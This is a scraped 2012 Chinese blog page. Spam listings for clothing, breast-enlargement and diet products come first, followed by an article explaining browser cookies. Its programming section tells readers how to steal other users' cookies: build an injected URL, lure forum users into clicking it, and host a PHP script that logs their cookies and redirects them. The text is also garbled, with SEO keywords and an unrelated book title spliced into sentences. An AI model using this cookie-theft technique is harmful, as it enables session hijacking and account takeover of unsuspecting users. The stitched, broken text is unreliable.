Click into





OSA秋装新品女装韩版修身OL通勤纯色泡泡袖小西装短外套女W13254 OSA2012秋装新品女装韩版修身通勤泡泡袖打底衫长袖T恤女款T13180 OSA2012秋装新品男装休闲宽松长袖圆领拼接针织T恤潮男MT24083



【限时7折】缪诗真爱邂逅超聚拢调整型女士内衣性感蕾丝 美背文胸 买一送二2件包邮 爆款文胸性感胸罩内衣 深V聚拢调整型文胸收副乳 可可迷 专柜正品 精油珠新女内衣胸罩 调整型文胸聚拢厚小胸T1065



丰胸产品 泰国圣荷纳米增大坚挺2月装 赠野葛根片中药丰胸药 Elelen左旋肉碱茶多酚减肥胶囊 瘦身产品 中草药配方 正品 买1送1 淘金币 快速丰乳膏美乳膏 丰胸精油搭配 美胸风胸丰胸产品排行榜



【Justyle】英伦立领时尚秋冬修身男士式装款立领拉链夹克外套 2012英伦新款秋冬季直筒型男款时尚纯棉潮流男士装休闲长裤 【Justyle】英伦新款男士休闲中腰宽松牛仔裤男款直筒牛仔裤



59元起 爱情侣公寓关谷恐龙睡衣连体冬珊瑚绒卡通家居服动物皮卡 家居服恐龙皮卡丘奶牛连体卡通动物可爱珊瑚绒爱情侣公寓关谷睡衣 包邮长袖卡通情侣连体睡衣动物珊瑚绒恐龙史迪仔熊猫加肥大码成康



怡君 2012秋冬季新款品 真皮平底雪地靴 狐狸毛短保暖靴 平跟女靴 淘金币 JUNJOY怡君 2012冬季 真皮雪地靴 女短靴子 平底跟情侣款 步伊鸟雪地靴女2012新款真皮牛皮保暖鞋雪地棉短筒平底短靴子女鞋



【一淘专享价】BEDOOK细肤淡印霜30g 去痘印凹洞痘印修复祛痘印 皙肤泉控油祛痘套装 祛痘印/青春痘 男女士去痘套装 正品 包邮 金丝玉帛清痘除印套装 中药消炎祛痘 去痘疤 痘印去豆坑男女正品
婴儿爬行垫

Cookie传递流程及安全问题vbscript函数

  编者按:Cookie在英文中是小甜品的意思,而这个词我们总能在浏览器中看到,食品怎么会跟浏览器扯上关系呢?在你浏览以前登陆过的网站时可能会在网页中出现:你好,感觉很亲切,就好像是吃了一个小甜品一样。这其实是通过访问你主机里边的一个文件来实现的,因此这个文件也就被称为了Cookie。想全面了解Cookie吗?看看下文吧!

  一、了解Cookie适用对象:初级读者

  Cookie是当你浏览某网站时,网站存储在你机器上的一个小文本文件,它记录了你的用户ID,密码、浏览过的网页、停留的时间等信息,当你再次来到该网站时,网站通过读取Cookie,得知你的相关信息,就可以做出相应的动作,如在页面显示欢迎你的,或者让你不用输入ID、密码就直接登录等等。你可以在IE的“工具/Internet选项”的“常规”选项卡中,选择“设置/查看文件”,查看所有保存到你电脑里的Cookie。这些文件通常是以user@domain格式命名的,user是你的本地用户名,domain是所访问的网站的域名。如果你使用NetsCape浏览器,则存放在“C:/PROGRAMFILES/NETSCAPE/USERS/”里面,与IE不同的是,NETSCAPE是使用一个Cookie文件记录所有网站的Cookies。

  为了上网安全我们需要对Cookie进行适当设置。打开“工具/Internet选项”中的“隐私”选项卡(注意该设置只在IE6.0中存在,其他版本IE可以在“工具/Internet选项”的“安全”标签中单击“自定义级别”按钮,进行简单调整),调整Cookie的安全级别。通常情况,可以将滑块调整到“中高”或者“高”的。多数的论坛站点需要使用Cookie信息,如果你从来不去这些地方,可以将安全级调到“所有Cookies”。如果只是为了个别网站的Cookie,可以单击“编辑”按钮,将要屏蔽的网站添加到列表中。在“高级”按钮选项中,你可以对第一方Cookie偷谌?降腃ookie进行设置,第一方Cookie是你正在浏览的网站的Cookie,第三方Cookie非正在浏览的网站发给你的Cookie,通常要对第三方Cookie选择“”,如图1。你如果需要保存Cookie,可以使用IE的“导入导出”功能,打开“文件/导入导出”,按提示操作即可。

  Cookie中的内容大多数经过了加密处理,因此在我们看来只Cookie传递流程及安全问题vbscript函数是一些毫无意义的字母数字组合,只有服务器的CGI处理程序才知道它们真正的含义。通过一些软件我们可以查看到更多的内容,使用CookiePal软件查看到的Cookie信息,如图2所示。它为我们提供了Server、Expires、Name、Value等选项的内容。其中,Server是存储Cookie的网站,Expires记录了Cookie的时间和生命期,Name和value字段则是具体的数据(本报第10期第42版对该软件有详细介绍)。

  二、Cookie的传递流程适用对象:中级读者

  vbscript函数当在浏览器地址栏中键入了一个Web站点的URL,浏览器会向该Web站点发送一个读取网页的请求,并将结果在显示器上显示。这时该网页在你的电脑上寻找Amazon网站设置的Cookie文件,如果找到,浏览器会把Cookie文件中的数据连同前面输入的URL一同发送到Amazon服务器。服务器收到Cookie数据,就会在他的数据库中检索你的ID,你的购物记录、个人喜好等信息,并记录下新的内容,增加到数据库和Cookie文件中去。如果没有检测到Cookie或者你的Cookie信息与数据库中的信息不符合,则说明你是第一次浏览该网站,服务器的CGI程序将为你创建新的ID信息,并保存到数据库中。

  Cookie是利用了网页代码中的HTTP头信息进行传递的,浏览器的每一次网页请求,都可以伴随Cookie传递,例如,浏览器的打开或刷新网页操作。服务器将Cookie添加到网页的HTTP头信息中,伴随网页数据传回到你的浏览器,浏览器会根据你电脑中的Cookie设置选择是否保存这些数据。如果浏览器不允许Cookie保存,则关掉浏览器后,这些数据就消失。Cookie在电脑上保存的时间是不一样的,这些都是由服务器的设置不同决定得。Cookie有一个Expires(有效期)属性,这个属性决定了Cookie的保存时间,服务器可以通过设定Expires字段的数值,来改变Cookie的保存时间。如果不设置该属性,那么Cookie只在浏览网页期间有效,关闭浏览器,这些Cookie自动消失,绝大多数网站属于这种情况。通常情况下,Cookie包含Server、Expires、Name、Value这几个字段,其中对服务器有用的只是Name和Value字段,Expires等字段的内容仅仅是为了告诉浏览器如何处理这些Cookies。

  三、Cookie的编程实现适用对象:高级读者

  多数网页编程语言都提供了对Cookie的支持。如JavaScript、VBScript、Delphi、ASP、SQL、PHP、C#等。在这些面向对象的编程语言中,对Cookie的编程利用基本上是相似的,大体过程为:先创建一个Cookie对象(Object),然后利用控制函数对Cookie进行赋值、读取、写入等操作。那么如何通过代码来获取其他用户Cookie中的信息?下面进行简单的介绍。

  该方法主要有两步,首先要定位你需要收集Cookie的网站,并对其进行分析1. 21世纪高等学校电子信息类专业规划教材-VisualFoxPro9.0数据库visualfoxpro(0),并构造URL;然后编制收集Cookie的PHP代码,并将其放到你可以控制的网站上,当不知情者单击了你构造的URL后可以执行该PHP代码。下面我们看具体的实现过程。

  1.分析并构造URL

  首先打开我们要收集Cookie的网站,这里假设是,登陆网站输入用户名“”(不含引号),对数据进行分析抓包,得到形如“”的代码,将“”更换为“”再试;如果执行成功,就开始构造URL:“”。其中就是你能够控制的某台主机上的一个脚本。需要注意的是“%2B”为符号“+”的URL编码,因为“+”将被作为空格处理。该URL就可以在论坛中发布,诱使别人点击了。

  2.编制PHP脚本

  该脚本的作用就是收集Cookie文件,具体内容如下:

  $info=getenv(QUERY_STRING);

  if($info){

  $fp=fopen(info.txt,a);

  fwrite($fp,$info./n);

  fclose($fp);

  }

  header(Location:

  ?>

  四、Cookie的安全问题适用对象:所有希望上网安全的读者

  1.Cookie

  Cookie记录着用户的帐户ID、密码之类的信息,如果在网上传递,通常使用的是MD5方法加密。这样经过加密处理后的信息,即使被网络上一些的人截获,也看不懂,因为他看到的只是一些无意义的字母和数字。然而,现在遇到的问题是,截获Cookie的人不需要知道这些字符串的含义,他们只要把别人的Cookie向服务器提交,并且能够通过验证,他们就可以冒充人的身份,登陆网站。这种方法叫做Cookie。Cookie实现的前提条件是服务器的验证程序存在漏洞,并且冒充者要获得被冒充的人的Cookie信息。目前网站的验证程序要排除所有非法登录常困难的,例如,编写验证程序使用的语言可能存在漏洞。而且要获得别人Cookie是很容易的,用支持Cookie的语言编写一小段代码就可以实现(具体方法见三),只要把这段代码放到网络里,那么所有人的Cookie都能够被收集。如果一个论坛允许HTML代码或者允许使用Flash标签就可以利用这些技术收集Cookie的代码放到论坛里,然后给帖子取一个吸引人的主题,写上有趣的内容,很快就可以收集到大量的Cookie。在论坛上,有许多人的密码就被这种方法盗去的。至于如何防范,目前还没有特效药,我们也只能使用通常的防护方法,不要在论坛里使用重要的密码,也不要使用IE自动保存密码的功能,以及尽量不登陆不了解底细的网站。

  2.Flash的代码隐患

  Flash中有一个getURL()函数,Flash可以利用这个函数自动打开指定的网页。因此它可能把你引向一个包含恶意代码的网站。打个比方,当你在自己电脑上欣赏精美的Flash动画时,动画帧里的代码可能已经悄悄地连上网,并打开了一个极小的包含有特殊代码的页面。这个页面可以收集你的Cookie、也可以做一些其他的事情,比如在你的机器上种植木马甚至格式化你的硬盘等等。对于Flash的这种行为,网站是无法的,因为这是Flash文件的内部行为。我们所能做到的,如果是在本地浏览尽量打开防火墙,如果防火墙提示的向外发送的数据包并不为你知悉,最好。如果是在Internet上欣赏,最好找一些知名的大网站。

posted on 2012-04-12 20:36  vbscript教程 vbscript.dll  阅读(146)  评论(0编辑  收藏  举报